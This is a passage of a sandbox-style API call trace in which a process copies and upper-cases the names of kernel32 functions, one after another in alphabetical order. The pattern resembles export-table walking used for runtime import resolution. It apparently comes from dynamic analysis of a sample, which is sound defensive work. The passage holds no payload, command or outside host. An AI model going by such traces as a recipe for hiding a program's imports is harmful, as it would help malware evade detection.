returned="CompareCalendarDates" [0030.719] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0030.719] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0030.719] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0030.719] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0030.719] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0030.719] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0030.719] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0030.719] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0030.719] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0030.719] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0030.719] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0030.720] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0030.720] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0030.720] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0030.720] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0030.720] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0030.720] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0030.720] lstrlenA (lpString="COPYCONTEXT") returned 11 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0030.720] lstrlenA (lpString="COPYFILEA") returned 9 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0030.720] lstrlenA (lpString="COPYFILEEXA") returned 11 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0030.720] lstrlenA (lpString="COPYFILEEXW") returned 11 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0030.720] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0030.720] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0030.720] lstrlenA (lpString="COPYFILEW") returned 9 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0030.720] lstrlenA (lpString="COPYLZFILE") returned 10 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0030.720] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0030.720] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0030.720] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0030.721] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0030.721] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0030.721] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0030.721] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0030.721] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0030.721] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0030.721] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0030.721] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0030.721] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0030.721] lstrlenA (lpString="CREATEEVENTA") returned 12 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0030.721] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0030.721] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0030.721] lstrlenA (lpString="CREATEEVENTW") returned 12 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0030.721] lstrlenA (lpString="CREATEFIBER") returned 11 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0030.721] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0030.721] lstrlenA (lpString="CREATEFILEA") returned 11 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0030.721] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0030.721] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0030.722] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0030.722] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0030.722] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0030.722] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0030.722] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0030.722] lstrlenA (lpString="CREATEFILEW") returned 11 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0030.722] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0030.722] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0030.722] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0030.722] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0030.722] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0030.722] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0030.722] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0030.722] lstrlenA (lpString="CREATEJOBSET") returned 12 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0030.722] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0030.722] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0030.722] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0030.722] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0030.723] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0030.723] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0030.723] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0030.723] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0030.723] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0030.723] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0030.723] lstrlenA (lpString="CREATEPIPE") returned 10 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0030.723] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0030.723] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0030.723] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0030.723] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0030.723] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0030.723] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0030.723] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0030.723] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0030.723] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0030.723] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0030.723] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0030.724] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0030.724] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0030.724] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0030.724] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0030.724] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0030.724] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0030.724] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0030.724] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0030.724] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0030.724] lstrlenA (lpString="CREATETHREAD") returned 12 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0030.724] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0030.724] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0030.724] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0030.724] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0030.724] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0030.724] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0030.724] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0030.724] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0030.725] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0030.725] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0030.725] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0030.725] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0030.725] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0030.725] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0030.725] lstrlenA (lpString="CTRLROUTINE") returned 11 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0030.725] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0030.725] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0030.725] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0030.725] lstrlenA (lpString="DEBUGBREAK") returned 10 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0030.725] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0030.725] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0030.725] lstrlenA (lpString="DECODEPOINTER") returned 13 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0030.725] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0030.725] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0030.725] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0030.725] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0030.726] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0030.726] lstrlenA (lpString="DELETEATOM") returned 10 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0030.726] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0030.726] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0030.726] lstrlenA (lpString="DELETEFIBER") returned 11 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0030.726] lstrlenA (lpString="DELETEFILEA") returned 11 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0030.726] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0030.726] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0030.726] lstrlenA (lpString="DELETEFILEW") returned 11 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0030.726] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0030.726] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0030.726] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0030.726] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0030.726] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0030.726] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0030.726] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0030.726] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0030.726] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0030.727] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0030.727] lstrcpyA (in: lpString1=0xc9e8c8, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0030.727] lstrlenA 